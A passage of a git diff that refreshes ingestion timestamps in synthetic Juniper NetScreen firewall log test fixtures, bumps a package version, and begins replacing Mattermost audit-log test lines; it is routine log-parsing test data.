+315,7 @@ { "message": "enderit: NetScreen device_id=taut [tanimi]system-medium-00515(commodi): emporain Admin User \"ntiumto\" logged in for umetMalo(https) management (port 2206) from 10.80.237.27:2883", "event": { - "ingested": "2021-11-22T13:04:30.321323958Z" + "ingested": "2021-12-14T14:48:09.217539635Z" }, "ecs": { "version": "1.12.0" @@ -327,7 +327,7 @@ { "message": "ori: NetScreen device_id=tconsect [rum]system-high-00073(eporroq): NSRP: Unit ulla of VSD group iqu oin", "event": { - "ingested": "2021-11-22T13:04:30.321326280Z" + "ingested": "2021-12-14T14:48:09.217540023Z" }, "ecs": { "version": "1.12.0" @@ -339,7 +339,7 @@ { "message": "mipsum: NetScreen device_id=lmo [aliquamq]system-medium-00030: X509 certificate for ScreenOS image authentication is invalid", "event": { - "ingested": "2021-11-22T13:04:30.321328635Z" + "ingested": "2021-12-14T14:48:09.217540408Z" }, "ecs": { "version": "1.12.0" @@ -351,7 +351,7 @@ { "message": "orroqu: NetScreen device_id=elitsed [labore]system-medium-00034(erc): PPPoE Settings changed", "event": { - "ingested": "2021-11-22T13:04:30.321330987Z" + "ingested": "2021-12-14T14:48:09.217540870Z" }, "ecs": { "version": "1.12.0" @@ -363,7 +363,7 @@ { "message": "ntNe: NetScreen device_id=itanim [nesciun]system-medium-00612: Switch event: the status of ethernet port mollita changed to link down , duplex full , speed 10 M. (2017-4-2 01:27:07)", "event": { - "ingested": "2021-11-22T13:04:30.321333327Z" + "ingested": "2021-12-14T14:48:09.217541274Z" }, "ecs": { "version": "1.12.0" @@ -375,7 +375,7 @@ { "message": "quide: NetScreen device_id=quaU [undeomni]system-medium-00077(acomm): NSRP: local unit= iutali of VSD group itat stlaboru", "event": { - "ingested": "2021-11-22T13:04:30.321335643Z" + "ingested": "2021-12-14T14:48:09.217541667Z" }, "ecs": { "version": "1.12.0" @@ -387,7 +387,7 @@ { "message": "emq: NetScreen device_id=plicaboN [amc]system-high-00536(acommo): IKE 10.10.77.119: Dropped packet because remote gateway OK is not used in any VPN tunnel configurations", "event": { - "ingested": "2021-11-22T13:04:30.321337923Z" + "ingested": "2021-12-14T14:48:09.217542064Z" }, "ecs": { "version": "1.12.0" @@ -399,7 +399,7 @@ { "message": "scivel: NetScreen device_id=henderi [iusmodt]system-medium-00536(tquas): IKE 10.200.22.41: Received incorrect ID payload: IP address lorinr instead of IP address ercita", "event": { - "ingested": "2021-11-22T13:04:30.321340249Z" + "ingested": "2021-12-14T14:48:09.217544586Z" }, "ecs": { "version": "1.12.0" @@ -411,7 +411,7 @@ { "message": "equu: NetScreen device_id=sintoc [atae]system-medium-00203(tem): mestq lsa flood on interface eth82 has dropped a packet.", "event": { - "ingested": "2021-11-22T13:04:30.321342721Z" + "ingested": "2021-12-14T14:48:09.217545137Z" }, "ecs": { "version": "1.12.0" @@ -423,7 +423,7 @@ { "message": "iqui: NetScreen device_id=tesseci [tat]system-high-00011(cive): The virtual router nse has been made unsharable", "event": { - "ingested": "2021-11-22T13:04:30.321345061Z" + "ingested": "2021-12-14T14:48:09.217545580Z" }, "ecs": { "version": "1.12.0" @@ -435,7 +435,7 @@ { "message": "rroqui: NetScreen device_id=ursin [utemvel]system-medium-00002: ADMIN AUTH: Privilege requested for unknown user atu. Possible HA syncronization problem.", "event": { - "ingested": "2021-11-22T13:04:30.321347411Z" + "ingested": "2021-12-14T14:48:09.217545974Z" }, "ecs": { "version": "1.12.0" @@ -447,7 +447,7 @@ { "message": "orumSe: NetScreen device_id=dolor [isiut]system-high-00206(emagn): OSPF instance with router-id emulla received a Hello packet flood from neighbor (IP address 10.219.1.151, router ID mnihilm) on Interface enp0s3375 forcing the interface to drop the packet.", "event": { - "ingested": "2021-11-22T13:04:30.321349725Z" + "ingested": "2021-12-14T14:48:09.217546360Z" }, "ecs": { "version": "1.12.0" @@ -459,7 +459,7 @@ { "message": "eque: NetScreen device_id=eufug [est]system-medium-00075: The local device ntincul in the Virtual Security Device group reet tquo", "event": { - "ingested": "2021-11-22T13:04:30.321352022Z" + "ingested": "2021-12-14T14:48:09.217546831Z" }, "ecs": { "version": "1.12.0" @@ -471,7 +471,7 @@ { "message": "imadmini: NetScreen device_id=ide [edq]system-medium-00026(tise): SSH: Attempt to unbind PKA key from admin user 'ntut' (Key ID emullam)", "event": { - "ingested": "2021-11-22T13:04:30.321354372Z" + "ingested": "2021-12-14T14:48:09.217547266Z" }, "ecs": { "version": "1.12.0" @@ -483,7 +483,7 @@ { "message": "ihilmole: NetScreen device_id=saquaea [ons]system-high-00048(quas): Route map entry with sequence number gia in route map binck-ospf in virtual router itatio was porinc (2017-8-22 23:52:50)", "event": { - "ingested": "2021-11-22T13:04:30.321356717Z" + "ingested": "2021-12-14T14:48:09.217547647Z" }, "ecs": { "version": "1.12.0" @@ -495,7 +495,7 @@ { "message": "orum: NetScreen device_id=oinBCSed [orem]system-medium-00050(ilm): Track IP enabled (2017-9-6 06:55:24)", "event": { - "ingested": "2021-11-22T13:04:30.321359056Z" + "ingested": "2021-12-14T14:48:09.217548050Z" }, "ecs": { "version": "1.12.0" @@ -507,7 +507,7 @@ { "message": "ncididun: NetScreen device_id=hen [periamea]system-medium-00555: Vrouter ali PIMSM cannot process non-multicast address 10.158.18.51", "event": { - "ingested": "2021-11-22T13:04:30.321361368Z" + "ingested": "2021-12-14T14:48:09.217548449Z" }, "ecs": { "version": "1.12.0" @@ -519,7 +519,7 @@ { "message": "umwri: NetScreen device_id=odoc [atura]system-high-00030: SYSTEM CPU utilization is high (oreeu \u003e nvo ) iamqui times in tassita minute (2017-10-4 21:00:32)\u003c\u003ccolabori\u003e", "event": { - "ingested": "2021-11-22T13:04:30.321363660Z" + "ingested": "2021-12-14T14:48:09.217548906Z" }, "ecs": { "version": "1.12.0" @@ -531,7 +531,7 @@ { "message": "inc: NetScreen device_id=tect [uiad]system-low-00003: The console debug buffer has been roinBCSe", "event": { - "ingested": "2021-11-22T13:04:30.321365977Z" + "ingested": "2021-12-14T14:48:09.217549283Z" }, "ecs": { "version": "1.12.0" @@ -543,7 +543,7 @@ { "message": "nseq: NetScreen device_id=borumSec [tatemseq]system-medium-00026(dmi): SCS has been tam for eth7686 .", "event": { - "ingested": "2021-11-22T13:04:30.321368380Z" + "ingested": "2021-12-14T14:48:09.217549668Z" }, "ecs": { "version": "1.12.0" @@ -555,7 +555,7 @@ { "message": "uiineavo: NetScreen device_id=sistena [uidexeac]system-high-00620(amquisno): RTSYNC: Event posted to send all the DRP routes to backup device. (2017-11-16 18:08:15)", "event": { - "ingested": "2021-11-22T13:04:30.321370825Z" + "ingested": "2021-12-14T14:48:09.217550053Z" }, "ecs": { "version": "1.12.0" @@ -567,7 +567,7 @@ { "message": "sunt: NetScreen device_id=dquianon [urExc]system-high-00025(iamqui): PKI: The current device quide to save the certificate authority configuration.", "event": { - "ingested": "2021-11-22T13:04:30.321373166Z" + "ingested": "2021-12-14T14:48:09.217550440Z" }, "ecs": { "version": "1.12.0" @@ -579,7 +579,7 @@ { "message": "etdol: NetScreen device_id=Sed [oremeumf]system-high-00076: The local device etur in the Virtual Security Device group fugiatn enima", "event": { - "ingested": "2021-11-22T13:04:30.321375497Z" + "ingested": "2021-12-14T14:48:09.217550912Z" }, "ecs": { "version": "1.12.0" @@ -591,7 +591,7 @@ { "message": "giatquo: NetScreen device_id=lors [its]system-low-00524: SNMP request from an unknown SNMP community public at 10.46.217.155:76 has been received. (2017-12-29 15:15:58)", "event": { - "ingested": "2021-11-22T13:04:30.321377786Z" + "ingested": "2021-12-14T14:48:09.217551303Z" }, "ecs": { "version": "1.12.0" @@ -603,7 +603,7 @@ { "message": "magnaa: NetScreen device_id=sumquiad [No Name]system-high-00628: audit log queue Event Log is overwritten (2018-1-12 22:18:32)", "event": { - "ingested": "2021-11-22T13:04:30.321380148Z" + "ingested": "2021-12-14T14:48:09.217551791Z" }, "ecs": { "version": "1.12.0" @@ -615,7 +615,7 @@ { "message": "tnulapa: NetScreen device_id=madmi [No Name]system-high-00628(adeser): audit log queue Event Log is overwritten (2018-1-27 05:21:06)", "event": { - "ingested": "2021-11-22T13:04:30.321382509Z" + "ingested": "2021-12-14T14:48:09.217552178Z" }, "ecs": { "version": "1.12.0" @@ -627,7 +627,7 @@ { "message": "laboree: NetScreen device_id=udantiu [itametco]system-high-00556(stiaecon): UF-MGR: usBono CPA server port changed to rumexe.", "event": { - "ingested": "2021-11-22T13:04:30.321384882Z" + "ingested": "2021-12-14T14:48:09.217552582Z" }, "ecs": { "version": "1.12.0" @@ -639,7 +639,7 @@ { "message": "nturmag: NetScreen device_id=uredol [maliqua]system-medium-00058(mquia): PIMSM protocol configured on interface eth2266", "event": { - "ingested": "2021-11-22T13:04:30.321387196Z" + "ingested": "2021-12-14T14:48:09.217552975Z" }, "ecs": { "version": "1.12.0" @@ -651,7 +651,7 @@ { "message": "ueporroq: NetScreen device_id=ute [No Name]system-low-00625: Session (id tationu src-ip 10.142.21.251 dst-ip 10.154.16.147 dst port 6881) route is valid. (2018-3-11 02:28:49)", "event": { - "ingested": "2021-11-22T13:04:30.321389497Z" + "ingested": "2021-12-14T14:48:09.217553358Z" }, "ecs": { "version": "1.12.0" @@ -663,7 +663,7 @@ { "message": "adipi: NetScreen device_id=mquis [ratvo]system-low-00042(isno): Replay packet detected on IPSec tunnel on enp0s1170 with tunnel ID nderiti! From 10.105.212.51 to 10.119.53.68/1783, giatqu (2018-3-25 09:31:24)", "event": { - "ingested": "2021-11-22T13:04:30.321391819Z" + "ingested": "2021-12-14T14:48:09.217553750Z" }, "ecs": { "version": "1.12.0" @@ -675,7 +675,7 @@ { "message": "emvel: NetScreen device_id=pta [dolo]system-medium-00057(eacommod): uamqu: static multicast route src=10.174.2.175, grp=aparia input ifp = lo6813 output ifp = enp0s90 added", "event": { - "ingested": "2021-11-22T13:04:30.321394153Z" + "ingested": "2021-12-14T14:48:09.217554131Z" }, "ecs": { "version": "1.12.0" @@ -687,7 +687,7 @@ { "message": "giat: NetScreen device_id=ttenb [eirure]system-high-00549(rem): add-route-\u003e untrust-vr: exer", "event": { - "ingested": "2021-11-22T13:04:30.321396472Z" + "ingested": "2021-12-14T14:48:09.217554586Z" }, "ecs": { "version": "1.12.0" @@ -699,7 +699,7 @@ { "message": "lapari: NetScreen device_id=rcitat [cinge]system-high-00536(luptate): IKE gateway eritqu has been elites. pariat", "event": { - "ingested": "2021-11-22T13:04:30.321398788Z" + "ingested": "2021-12-14T14:48:09.217554964Z" }, "ecs": { "version": "1.12.0" @@ -711,7 +711,7 @@ { "message": "accus: NetScreen device_id=CSed [tiu]system-low-00049(upta): The router-id of virtual router \"asper\" used by OSPF, BGP routing instances id has been uninitialized. (dictasun)", "event": { - "ingested": "2021-11-22T13:04:30.321401114Z" + "ingested": "2021-12-14T14:48:09.217555359Z" }, "ecs": { "version": "1.12.0" @@ -723,7 +723,7 @@ { "message": "itanimi: NetScreen device_id=onoru [data]system-high-00064(eosqui): Can not create track-ip list", "event": { - "ingested": "2021-11-22T13:04:30.321403410Z" + "ingested": "2021-12-14T14:48:09.217555758Z" }, "ecs": { "version": "1.12.0" @@ -735,7 +735,7 @@ { "message": "int: NetScreen device_id=ionevo [llitani]system-high-00541(itametco): The system killed OSPF neighbor because the current router could not see itself in the hello packet. Neighbor changed state from etcons to etco state, (neighbor router-id 1iuntN, ip-address 10.89.179.48). (2018-6-19 03:46:49)", "event": { - "ingested": "2021-11-22T13:04:30.321405789Z" + "ingested": "2021-12-14T14:48:09.217556144Z" }, "ecs": { "version": "1.12.0" @@ -747,7 +747,7 @@ { "message": "mmodicon: NetScreen device_id=eetdo [mquisno]system-low-00017(lup): mipsamv From 10.57.108.5:5523 using protocol icmp on interface enp0s4987. The attack occurred 2282 times", "event": { - "ingested": "2021-11-22T13:04:30.321408180Z" + "ingested": "2021-12-14T14:48:09.217556606Z" }, "ecs": { "version": "1.12.0" @@ -759,7 +759,7 @@ { "message": "inimve: NetScreen device_id=aea [emipsumd]system-low-00263(ptat): Admin user saq has been accepted via the asiarch server at 10.197.10.110", "event": { - "ingested": "2021-11-22T13:04:30.321410507Z" + "ingested": "2021-12-14T14:48:09.217556989Z" }, "ecs": { "version": "1.12.0" @@ -771,7 +771,7 @@ { "message": "tlab: NetScreen device_id=vel [ionevo]system-high-00622: NHRP : NHRP instance in virtual router ptate is created. (2018-8-1 00:54:32)", "event": { - "ingested": "2021-11-22T13:04:30.321412831Z" + "ingested": "2021-12-14T14:48:09.217557396Z" }, "ecs": { "version": "1.12.0" @@ -783,7 +783,7 @@ { "message": "qui: NetScreen device_id=caboN [imipsam]system-high-00528(catcupid): SSH: Admin user 'ritquiin' at host 10.59.51.171 requested unsupported authentication method texplica", "event": { - "ingested": "2021-11-22T13:04:30.321415185Z" + "ingested": "2021-12-14T14:48:09.217557799Z" }, "ecs": { "version": "1.12.0" @@ -795,7 +795,7 @@ { "message": "udexerci: NetScreen device_id=uae [imveni]system-medium-00071(ptatemse): NSRP: Unit itationu of VSD group setquas nbyCi", "event": { - "ingested": "2021-11-22T13:04:30.321417531Z" + "ingested": "2021-12-14T14:48:09.217558186Z" }, "ecs": { "version": "1.12.0" @@ -807,7 +807,7 @@ { "message": "isno: NetScreen device_id=luptatev [occaeca]system-high-00018(urau): aeca Policy (oNem, itaedict ) was eroi from host 10.80.103.229 by admin fugitsed (2018-9-12 22:02:15)", "event": { - "ingested": "2021-11-22T13:04:30.321419862Z" + "ingested": "2021-12-14T14:48:09.217558642Z" }, "ecs": { "version": "1.12.0" @@ -819,7 +819,7 @@ { "message": "utlabore: NetScreen device_id=edquiano [mSecti]system-high-00207(tDuisaut): RIP database size limit exceeded for uel, RIP route dropped.", "event": { - "ingested": "2021-11-22T13:04:30.321422185Z" + "ingested": "2021-12-14T14:48:09.217559028Z" }, "ecs": { "version": "1.12.0" @@ -831,7 +831,7 @@ { "message": "agn: NetScreen device_id=iqu [quamqua]system-high-00075: NSRP: Unit equeporr of VSD group amremap oremagna", "event": { - "ingested": "2021-11-22T13:04:30.321424513Z" + "ingested": "2021-12-14T14:48:09.217559429Z" }, "ecs": { "version": "1.12.0" @@ -843,7 +843,7 @@ { "message": "ntium: NetScreen device_id=ide [quunturm]system-low-00040(isautem): High watermark for early aging has been changed to the default usan", "event": { - "ingested": "2021-11-22T13:04:30.321426829Z" + "ingested": "2021-12-14T14:48:09.217559816Z" }, "ecs": { "version": "1.12.0" @@ -855,7 +855,7 @@ { "message": "catcu: NetScreen device_id=quame [tionemu]system-low-00524(eursi): SNMP host 10.163.9.35 cannot be removed from community uatDu because failure", "event": { - "ingested": "2021-11-22T13:04:30.321429166Z" + "ingested": "2021-12-14T14:48:09.217560211Z" }, "ecs": { "version": "1.12.0" @@ -867,7 +867,7 @@ { "message": "cteturad: NetScreen device_id=modi [No Name]system-low-00625(ecatcu): Session (id ntoccae src-ip 10.51.161.245 dst-ip 10.193.80.21 dst port 5657) route is valid. (2018-11-23 09:15:06)", "event": { - "ingested": "2021-11-22T13:04:30.321431481Z" + "ingested": "2021-12-14T14:48:09.217560685Z" }, "ecs": { "version": "1.12.0" @@ -879,7 +879,7 @@ { "message": "chit: NetScreen device_id=iusmodit [lor]system-high-00524(adeserun): SNMP request has been received, but success", "event": { - "ingested": "2021-11-22T13:04:30.321433785Z" + "ingested": "2021-12-14T14:48:09.217561073Z" }, "ecs": { "version": "1.12.0" @@ -891,7 +891,7 @@ { "message": "vento: NetScreen device_id=litsed [ciun]system-medium-00072: The local device inrepr in the Virtual Security Device group lla changed state", "event": { - "ingested": "2021-11-22T13:04:30.321436203Z" + "ingested": "2021-12-14T14:48:09.217561600Z" }, "ecs": { "version": "1.12.0" @@ -903,7 +903,7 @@ { "message": "rissusci: NetScreen device_id=uaturQ [iusmod]system-medium-00533(mips): VIP server 10.41.222.7 is now responding", "event": { - "ingested": "2021-11-22T13:04:30.321438546Z" + "ingested": "2021-12-14T14:48:09.217561990Z" }, "ecs": { "version": "1.12.0" @@ -915,7 +915,7 @@ { "message": "upta: NetScreen device_id=ivel [tmollita]system-low-00070(deFinib): NSRP: nsrp control channel change to lo4065", "event": { - "ingested": "2021-11-22T13:04:30.321440869Z" + "ingested": "2021-12-14T14:48:09.217562447Z" }, "ecs": { "version": "1.12.0" @@ -927,7 +927,7 @@ { "message": "ommodic: NetScreen device_id=mmodic [essequam]system-low-00040(nihi): VPN 'xeaco' from 10.134.20.213 is eavolupt (2019-2-2 20:27:57)", "event": { - "ingested": "2021-11-22T13:04:30.321443194Z" + "ingested": "2021-12-14T14:48:09.217562843Z" }, "ecs": { "version": "1.12.0" @@ -939,7 +939,7 @@ { "message": "ptasnul: NetScreen device_id=utaliqui [mcorpor]system-medium-00023(ostru): VIP/load balance server 10.110.144.189 cannot be contacted", "event": { - "ingested": "2021-11-22T13:04:30.321445503Z" + "ingested": "2021-12-14T14:48:09.217563227Z" }, "ecs": { "version": "1.12.0" @@ -951,7 +951,7 @@ { "message": "luptatem: NetScreen device_id=ing [hen]system-medium-00034(umquid): SCS: SCS has been olabo for tasnu with conse existing PKA keys already bound to ruredolo SSH users.", "event": { - "ingested": "2021-11-22T13:04:30.321447816Z" + "ingested": "2021-12-14T14:48:09.217563609Z" }, "ecs": { "version": "1.12.0" @@ -963,7 +963,7 @@ { "message": "iat: NetScreen device_id=orain [equaturQ]system-low-00554: SCAN-MGR: Attempted to load AV pattern file created quia after the AV subscription expired. (Exp: Exce)", "event": { - "ingested": "2021-11-22T13:04:30.321450137Z" + "ingested": "2021-12-14T14:48:09.217564004Z" }, "ecs": { "version": "1.12.0" @@ -975,7 +975,7 @@ { "message": "dese: NetScreen device_id=ptasn [liqui]system-low-00541: ScreenOS invol serial # Loremips: Asset recovery has been cidun", "event": { - "ingested": "2021-11-22T13:04:30.321452464Z" + "ingested": "2021-12-14T14:48:09.217564386Z" }, "ecs": { "version": "1.12.0" @@ -987,7 +987,7 @@ { "message": "ole: NetScreen device_id=odi [tper]system-medium-00628(ectetur): audit log queue Event Log is overwritten (2019-4-15 07:40:49)", "event": { - "ingested": "2021-11-22T13:04:30.321454819Z" + "ingested": "2021-12-14T14:48:09.217564768Z" }, "ecs": { "version": "1.12.0" @@ -999,7 +999,7 @@ { "message": "iadolo: NetScreen device_id=ecatcup [No Name]system-high-00628: audit log queue Traffic Log is overwritten (2019-4-29 14:43:23)", "event": { - "ingested": "2021-11-22T13:04:30.321457147Z" + "ingested": "2021-12-14T14:48:09.217565164Z" }, "ecs": { "version": "1.12.0" @@ -1011,7 +1011,7 @@ { "message": "qui: NetScreen device_id=iaecon [dminima]system-high-00538(psaquaea): NACN failed to register to Policy Manager eabillo because of success", "event": { - "ingested": "2021-11-22T13:04:30.321459455Z" + "ingested": "2021-12-14T14:48:09.217565579Z" }, "ecs": { "version": "1.12.0" @@ -1023,7 +1023,7 @@ { "message": "eosqu: NetScreen device_id=reetdolo [umquam]system-low-00075(enderi): The local device labore in the Virtual Security Device group uasiarch changed state from iamquisn to inoperable. (2019-5-28 04:48:31)", "event": { - "ingested": "2021-11-22T13:04:30.321461772Z" + "ingested": "2021-12-14T14:48:09.217565972Z" }, "ecs": { "version": "1.12.0" @@ -1035,7 +1035,7 @@ { "message": "veleumi: NetScreen device_id=volupt [equ]system-high-00535(ure): SCEP_FAILURE message has been received from the CA", "event": { - "ingested": "2021-11-22T13:04:30.321464099Z" + "ingested": "2021-12-14T14:48:09.217566441Z" }, "ecs": { "version": "1.12.0" @@ -1047,7 +1047,7 @@ { "message": "reseo: NetScreen device_id=entoreve [rudexer]system-medium-00026(iruredol): IKE iad: Missing heartbeats have exceeded the threshold. All Phase 1 and 2 SAs have been removed", "event": { - "ingested": "2021-11-22T13:04:30.321466404Z" + "ingested": "2021-12-14T14:48:09.217566829Z" }, "ecs": { "version": "1.12.0" @@ -1059,7 +1059,7 @@ { "message": "ptate: NetScreen device_id=oloreeu [imipsa]system-high-00038: OSPF routing instance in vrouter uame taevitae", "event": { - "ingested": "2021-11-22T13:04:30.321468724Z" + "ingested": "2021-12-14T14:48:09.217567215Z" }, "ecs": { "version": "1.12.0" @@ -1071,7 +1071,7 @@ { "message": "archi: NetScreen device_id=caboNe [ptate]system-high-00003(ius): Multiple authentication failures have been detected!", "event": { - "ingested": "2021-11-22T13:04:30.321498498Z" + "ingested": "2021-12-14T14:48:09.217567609Z" }, "ecs": { "version": "1.12.0" @@ -1083,7 +1083,7 @@ { "message": "remap: NetScreen device_id=ntium [veniamqu]system-high-00529: DNS entries have been refreshed by HA", "event": { - "ingested": "2021-11-22T13:04:30.321502378Z" + "ingested": "2021-12-14T14:48:09.217568011Z" }, "ecs": { "version": "1.12.0" @@ -1095,7 +1095,7 @@ { "message": "llumdo: NetScreen device_id=tot [itquii]system-high-00625(erspici): Session (id oreeu src-ip 10.126.150.15 dst-ip 10.185.50.112 dst port 7180) route is invalid. (2019-8-21 23:03:57)", "event": { - "ingested": "2021-11-22T13:04:30.321504836Z" + "ingested": "2021-12-14T14:48:09.217568479Z" }, "ecs": { "version": "1.12.0" @@ -1107,7 +1107,7 @@ { "message": "quepo: NetScreen device_id=tDuisa [iscive]system-medium-00521: Can't connect to E-mail server 10.152.90.59", "event": { - "ingested": "2021-11-22T13:04:30.321507202Z" + "ingested": "2021-12-14T14:48:09.217568867Z" }, "ecs": { "version": "1.12.0" @@ -1119,7 +1119,7 @@ { "message": "lorem: NetScreen device_id=icons [hende]system-low-00077(usBonor): HA link disconnect. Begin to use second path of HA", "event": { - "ingested": "2021-11-22T13:04:30.321515372Z" + "ingested": "2021-12-14T14:48:09.217569251Z" }, "ecs": { "version": "1.12.0" @@ -1131,7 +1131,7 @@ { "message": "preh: NetScreen device_id=dol [No Name]system-low-00625: Session (id gnamal src-ip 10.119.181.171 dst-ip 10.166.144.66 dst port 3051) route is invalid. (2019-10-3 20:11:40)", "event": { - "ingested": "2021-11-22T13:04:30.321518265Z" + "ingested": "2021-12-14T14:48:09.217569631Z" }, "ecs": { "version": "1.12.0" @@ -1143,7 +1143,7 @@ { "message": "avolup: NetScreen device_id=litse [archit]system-high-00041(untutlab): A route-map name in virtual router estqu has been removed", "event": { - "ingested": "2021-11-22T13:04:30.321520710Z" + "ingested": "2021-12-14T14:48:09.217570034Z" }, "ecs": { "version": "1.12.0" @@ -1155,7 +1155,7 @@ { "message": "eddoeiu: NetScreen device_id=consect [eetdolo]system-medium-00038(remipsum): OSPF routing instance in vrouter ons emporin", "event": { - "ingested": "2021-11-22T13:04:30.321523110Z" + "ingested": "2021-12-14T14:48:09.217570493Z" }, "ecs": { "version": "1.12.0" @@ -1167,7 +1167,7 @@ { "message": "texpl: NetScreen device_id=isquames [No Name]system-low-00021: DIP port-translation stickiness was atio by utla via ntm from host 10.96.165.147 to 10.96.218.99:277 (2019-11-15 17:19:22)", "event": { - "ingested": "2021-11-22T13:04:30.321525532Z" + "ingested": "2021-12-14T14:48:09.217570881Z" }, "ecs": { "version": "1.12.0" @@ -1179,7 +1179,7 @@ { "message": "elaudant: NetScreen device_id=ratvolu [odte]system-medium-00021(eum): DIP port-translation stickiness was uidol by repr via idu from host 10.201.72.59 to 10.230.29.67:7478 (2019-11-30 00:21:57)", "event": { - "ingested": "2021-11-22T13:04:30.321527923Z" + "ingested": "2021-12-14T14:48:09.217571266Z" }, "ecs": { "version": "1.12.0" @@ -1191,7 +1191,7 @@ { "message": "toc: NetScreen device_id=rau [sciuntN]system-low-00602: PIMSM Error in initializing interface state change", "event": { - "ingested": "2021-11-22T13:04:30.321530334Z" + "ingested": "2021-12-14T14:48:09.217571671Z" }, "ecs": { "version": "1.12.0" diff --git a/packages/juniper_netscreen/manifest.yml b/packages/juniper_netscreen/manifest.yml index b7a9e7ad958..a16369d22fe 100644 --- a/packages/juniper_netscreen/manifest.yml +++ b/packages/juniper_netscreen/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: juniper_netscreen title: Juniper NetScreen -version: 0.0.1 +version: 0.0.2 description: Collect logs from Juniper NetScreen with Elastic Agent. categories: ["network", "security"] release: experimental diff --git a/packages/mattermost/data_stream/audit/_dev/test/pipeline/test-audit.log b/packages/mattermost/data_stream/audit/_dev/test/pipeline/test-audit.log index 828456aad58..b8bb124e03e 100644 --- a/packages/mattermost/data_stream/audit/_dev/test/pipeline/test-audit.log +++ b/packages/mattermost/data_stream/audit/_dev/test/pipeline/test-audit.log @@ -1,32 +1,32 @@ -{"timestamp":"2021-12-04 23:19:32.051 Z","event":"updateConfig","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"pjh4n69j3p883k7hhzippskcba","ip_address":"55.33.6.7","api_path":"/api/v4/config","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} -{"timestamp":"2021-12-04 23:19:48.599 Z","event":"updateConfig","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"pjh4n69j3p883k7hhzippskcba","ip_address":"55.33.6.7","api_path":"/api/v4/config","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} -{"timestamp":"2021-12-04 23:19:51.324 Z","event":"Logout","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"pjh4n69j3p883k7hhzippskcba","ip_address":"55.33.6.7","api_path":"/api/v4/users/logout","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} -{"timestamp":"2021-12-04 23:19:58.729 Z","event":"login","status":"success","user_id":"","session_id":"","ip_address":"55.33.6.7","api_path":"/api/v4/users/login","device_id":"","login_id":"admin","user":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} -{"timestamp":"2021-12-04 23:20:33.027 Z","event":"patchUser","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/users/me/patch","patch":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"user":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} -{"timestamp":"2021-12-04 23:20:37.771 Z","event":"patchUser","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/users/me/patch","patch":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"user":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} -{"timestamp":"2021-12-04 23:20:53.063 Z","event":"updatePassword","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/users/ag99yu4i1if63jrui63tsmq57y/password","user":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} -{"timestamp":"2021-12-04 23:28:18.032 Z","event":"updatePreferences","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/users/ag99yu4i1if63jrui63tsmq57y/preferences","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} -{"timestamp":"2021-12-04 23:28:19.342 Z","event":"createPost","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/posts","post":{"id":"gbuu48qc17bbjq4xdg5ciq4iao","channel_id":"hkmb8e53ijdkbc8agbpuxe8qxc","type":"","pinned":false},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} -{"timestamp":"2021-12-05 00:01:23.974 Z","event":"createChannel","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/channels","channel":{"id":"cje83zmowjds9ywg6m4jf8w7oe","name":"public-channel","type":"O"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) 